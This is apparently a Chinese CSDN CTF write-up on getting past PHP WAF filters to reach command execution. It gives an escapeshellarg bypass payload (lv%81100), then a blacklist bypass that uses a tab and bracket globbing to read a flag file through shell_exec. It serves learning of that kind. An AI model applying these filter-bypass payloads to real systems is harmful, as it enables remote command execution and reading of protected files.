• WAF绕过 RCE


    1.第一关:

    1. if ((!preg_match('/lv100/i',$level)) && (preg_match('/lv100/i',escapeshellarg($level)))){
    2. echo file_get_contents('./hint.php');
    3. }

    escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellarg 和 escapeshellcmd 相似,主要看是否有引号)

    那么这里就可以使用漏洞:escapeshellarg()这个函数在处理超过ASCII码范围的字符的时候会直接过滤掉该字符串

    那么我们直接我们可以用%81去绕过,因为%81为不可见字符(当然还有其他的)

    那最终这里的paylaod:levelup=lv%81100

     第二关:有长度限制(不可以base64编码绕过flag)且有过滤

    1. function DefenderBonus($Pokemon){
    2. if(preg_match("/'| |_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\~|\||\"|\<|\>|\=|{|}|\!|\&|\*|\?|\(|\)/i",$Pokemon)){
    3. die('catch broken Pokemon! mew-_-two');
    4. }
    5. else{
    6. return $Pokemon;
    7. }
    8. }
    9. function ghostpokemon($Pokemon){
    10. if(is_array($Pokemon)){
    11. foreach ($Pokemon as $key => $pks) {
    12. $Pokemon[$key] = DefenderBonus($pks);
    13. }
    14. }
    15. else{
    16. $Pokemon = DefenderBonus($Pokemon);
    17. }
    18. }
    19. $dream = $_POST["dream"] ?? "";
    20. if(strlen($dream)>=20){
    21. die("So Big Pokenmon!");
    22. }
    23. ghostpokemon($dream);
    24. echo shell_exec($dream);
    如何使用读取命令

    od 是一个在Unix和Linux系统上可用的命令行工具,用于以不同的格式显示文件的内容。它的名称代表"octal dump"(八进制转储),因为它最初的目的是以八进制形式显示文件的内容

    如何绕过FLAG

    这里用到了[]通配的形式,由于黑名单中有A何L这两个字符,因此构造F[B-Z][@-Z]G,这样就能匹配上ASCII表中的@到Z之间的所有字符

    dream=od%09/F[B-Z][@-Z]G

  • 相关阅读:
    NX二次开发-NX客户机与服务器FTP上传下载文件
    win10系统下使用opencv-dnn部署yolov5模型
    搞懂 MySql 的架构和执行流程
    ARM架构指令集--专用指令
    client-go学习(6)Informer
    〖全域运营实战白宝书 - 高转化文案速成篇④〗- 如何撰写摘要型文案?
    设计模式 --- 适配器模式 Adapter Pattern
    docker打包并且推送到远端服务器
    Morgan Stanley面经
    Go语言指针简介
  • 原文地址:https://blog.csdn.net/m0_73847654/article/details/134549544